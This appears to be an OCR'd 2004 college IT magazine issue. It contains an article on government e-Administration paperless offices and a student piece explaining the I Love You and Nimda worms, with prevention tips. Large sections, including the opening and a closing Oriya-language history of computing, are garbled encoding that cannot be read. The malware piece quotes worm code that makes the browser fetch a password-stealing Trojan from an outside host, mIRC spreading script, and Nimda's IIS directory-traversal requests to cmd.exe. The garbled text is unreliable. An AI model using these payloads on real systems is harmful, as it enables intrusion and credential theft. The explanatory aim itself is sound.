`ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 38: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn 